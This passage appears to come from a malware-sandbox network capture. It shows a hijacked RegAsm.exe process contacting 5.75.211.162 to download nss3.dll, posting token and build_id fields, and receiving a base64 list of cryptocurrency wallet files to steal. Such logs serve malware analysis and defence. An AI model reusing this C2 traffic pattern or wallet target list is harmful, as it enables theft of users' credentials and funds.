                                                                                    Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                    2024-09-26 22:14:52 UTC16384INData Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01
                                                                                    Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                    2024-09-26 22:14:52 UTC16384INData Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f
                                                                                    Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                    2024-09-26 22:14:52 UTC15605INData Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f
                                                                                    Data Ascii: T@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.4497565.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:52 UTC193OUTGET /nss3.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:53 UTC263INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:53 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 2046288
                                                                                    Connection: close
                                                                                    Last-Modified: Thursday, 26-Sep-2024 22:14:53 GMT
                                                                                    Cache-Control: no-store, no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    2024-09-26 22:14:53 UTC16121INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a
                                                                                    Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45
                                                                                    Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10
                                                                                    Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd
                                                                                    Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3
                                                                                    Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b
                                                                                    Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                    Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                    Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                    2024-09-26 22:14:53 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                    Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.4497575.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:55 UTC278OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJK
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 1145
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:55 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JJJEGHDAECBFHJKEGIJKCont
                                                                                    2024-09-26 22:14:56 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.4497585.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:56 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------IDHIEBAAKJDHIECAAFHCCont
                                                                                    2024-09-26 22:14:57 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:57 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:57 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.4497595.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:58 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFC
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 331
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:58 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------KEBKJDBAAKJDGCBFHCFCContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------KEBKJDBAAKJDGCBFHCFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------KEBKJDBAAKJDGCBFHCFCCont
                                                                                    2024-09-26 22:14:59 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:58 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
